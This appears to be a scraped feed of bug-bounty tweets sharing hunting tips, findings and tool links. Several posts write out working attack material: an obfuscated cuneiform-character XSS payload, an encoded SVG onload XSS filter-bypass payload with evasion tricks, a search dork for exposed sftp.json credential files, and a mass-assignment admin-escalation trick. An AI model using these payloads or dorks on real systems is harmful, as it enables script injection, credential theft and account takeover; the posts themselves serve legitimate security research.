Moulchi(@oualilweb) 's Twitter Profile Photo
Moulchi
@oualilweb

5 hours ago

Decompiled an Android app and discovered an endpoint vulnerable to SQLi.
Don't overlook mobile apps. they can be a goldmine for juicy things

tips

Decompiled an Android app and discovered an endpoint vulnerable to SQLi. Don't overlook mobile apps. they can be a goldmine for juicy things #bugbounty #bugbountytips
account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo
Root Moksha
@RootMoksha

1 hour ago

POSSIBLE HEADER INJECTION POINT WHERE YOU CAN TEST PAYLOADS

Credit:Coffin

tips

POSSIBLE HEADER INJECTION POINT WHERE YOU CAN TEST PAYLOADS Credit:@coffinxp7 #bugbountytips #bugbounty
account_circle
Naina Malik(@encrypt3dpoison) 's Twitter Profile Photo
Naina Malik
@encrypt3dpoison

10 hours ago

Admin Panel Takeover.. Self Hosted programโ€ฆ ATO is lub โค๏ธ
And then I found IDOR in whole panel ๐Ÿ˜.

Admin Panel Takeover.. Self Hosted programโ€ฆ ATO is lub โค๏ธ And then I found IDOR in whole panel ๐Ÿ˜. #BugBounty #ethicalhacking
account_circle
Coffin(@coffinxp7) 's Twitter Profile Photo
Coffin
@coffinxp7

10 hours ago

POSSIBLE HEADER INJECTION POINT WHERE YOU CAN TEST PAYLOADS :)

POSSIBLE HEADER INJECTION POINT WHERE YOU CAN TEST PAYLOADS :) #BugBounty #bugbountytips
account_circle
N$ ๐Ÿฅ(@nav1n0x) 's Twitter Profile Photo
N$ ๐Ÿฅ
@nav1n0x

2 days ago

I just added an extra property 'is-site-admin':true, and voilร , I became one of the site admins.๐Ÿคฃ๐Ÿคฃ๐Ÿคฃ๐ŸคŸ๐ŸคŸ

I just added an extra property 'is-site-admin':true, and voilร , I became one of the site admins.๐Ÿคฃ๐Ÿคฃ๐Ÿคฃ๐ŸคŸ๐ŸคŸ#bugbounty
account_circle
Brut ๐Ÿ‡ฎ๐Ÿ‡ณ(@wtf_brut) 's Twitter Profile Photo
Brut ๐Ÿ‡ฎ๐Ÿ‡ณ
@wtf_brut

5 days ago

๐Ÿ“ขa XSS payload, Cuneiform-alphabet based ! ๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++], ๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€] +(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€] +๐’€Ÿ][๐’น](๐’€ƒ[๐’€€]+๐’€ƒ[๐’ˆซ]+๐’‰บ[๐’€†]+๐’€Ÿ+๐’Œ+'(๐’€€)')()

tips

๐Ÿ“ขa XSS payload, Cuneiform-alphabet based ! ๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++], ๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€] +(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€] +๐’€Ÿ][๐’น](๐’€ƒ[๐’€€]+๐’€ƒ[๐’ˆซ]+๐’‰บ[๐’€†]+๐’€Ÿ+๐’Œ+'(๐’€€)')() #bugbounty #bugbountytips
account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo
Root Moksha
@RootMoksha

1 day ago

Bug Hunting Methodology by Coffin

tips

Bug Hunting Methodology by @coffinxp7 #bugbountytips #bugbounty
account_circle
Rachid.A(@zhero___) 's Twitter Profile Photo
Rachid.A
@zhero___

1 day ago

Yeay, I was awarded for a valid submission on HackenProof hackenproof.com

account_circle
Akita ๐Ÿ‡ฆ๐Ÿ‡ท who Am I ?(@akita_zen) 's Twitter Profile Photo
Akita ๐Ÿ‡ฆ๐Ÿ‡ท who Am I ?
@akita_zen

5 days ago

meme time xd

meme time xd #bugbounty #infosec #meme
account_circle
Hacking Articles(@hackinarticles) 's Twitter Profile Photo
Hacking Articles
@hackinarticles

3 days ago

OSI Layers and Attacks

urity awareness tips

OSI Layers and Attacks #infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips
account_circle
Jefferson Gonzales(@gonzxph) 's Twitter Profile Photo
Jefferson Gonzales
@gonzxph

3 hours ago

Every month, I always check my target for new features because new features are possible for bugs.

tips

Every month, I always check my target for new features because new features are possible for bugs. #bugbounty #bugbountytips
account_circle
whyusaa(@w_n1rmala) 's Twitter Profile Photo
whyusaa
@w_n1rmala

15 hours ago

another logic error, ubiquiti triaged:)

another logic error, ubiquiti triaged:) #bugbounty
account_circle
Rohit(@rohsec) 's Twitter Profile Photo
Rohit
@rohsec

1 week ago

Clear Verified ๐Ÿ™ƒ
tips

Clear Verified ๐Ÿ™ƒ #bugbounty #bugbountytips #cybersecurity
account_circle
bugscout(@scoutbug2) 's Twitter Profile Photo
bugscout
@scoutbug2

4 hours ago

Files Containing Juicy Info inurl:'/.vscode/sftp.json'
tips tip

Files Containing Juicy Info inurl:'/.vscode/sftp.json' #bugbounty #bugbountytips #bugbountytip #cybersecurity #ethicalhacking
account_circle
Hacking Articles(@hackinarticles) 's Twitter Profile Photo
Hacking Articles
@hackinarticles

3 days ago

Network Security Illustrated

urity awareness tips

Network Security Illustrated #infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips
account_circle
Maxdha ๐Ÿ‡ต๐Ÿ‡ธ(@maxdha1) 's Twitter Profile Photo
Maxdha ๐Ÿ‡ต๐Ÿ‡ธ
@maxdha1

5 days ago

After 6 hours, found this insane IDOR!
Tip: Never skip JavaScript files, even if they look unimportant.. Many hackers do, apparently :D
s

After 6 hours, found this insane IDOR! Tip: Never skip JavaScript files, even if they look unimportant.. Many hackers do, apparently :D #BugBounty #bugbountytips #bugbountytip
account_circle
Bug Bounty Reports Explained(@gregxsunday) 's Twitter Profile Photo
Bug Bounty Reports Explained
@gregxsunday

4 days ago

Browser-powered desync tips hunter

account_circle
Sergio Medeiros(@grumpzsux) 's Twitter Profile Photo
Sergio Medeiros
@grumpzsux

1 day ago

Basic XSS Encoding Tips โฌ

1) alert = window['al'+'ert']
2) bypass () with ``
3) replace space with /
4) encode symbols:

< = %3c
> = %3e
' = %22
[ = %5b
] = %5d
` = %60

Example Payload:
%3csvg/onload=window%5b'al'+'ert'%5d`1337`%3e

tips

account_circle
HackGit(@hack_git) 's Twitter Profile Photo
HackGit
@hack_git

2 days ago

OFFAT

The OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving towards completion

github.com/OWASP/OFFAT

OFFAT The OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving towards completion github.com/OWASP/OFFAT #bugbounty #pentesting #redteam
account_circle